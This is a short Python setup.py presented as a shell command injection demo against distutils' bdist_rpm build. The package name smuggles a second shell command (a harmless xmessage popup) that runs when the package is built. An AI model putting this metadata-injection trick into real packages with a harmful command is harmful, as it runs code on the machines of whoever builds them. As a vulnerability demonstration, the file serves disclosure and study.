#!/usr/bin/env python # run this script with "python setup.py bdist_rpm" import distutils.core name = "My Prog ';xmessage hello world;' " distutils.core.setup(name=name, version='1.0', author="Bernd Dietzel", author_email="theregrunner@no.thing", url="http://theregrunner.com", description="Shell command injection demo", long_description="This script injects the command in the name", license="CC", scripts=[name], data_files=[ ('/usr/share/man/man1', [name + '.1.gz']), ], )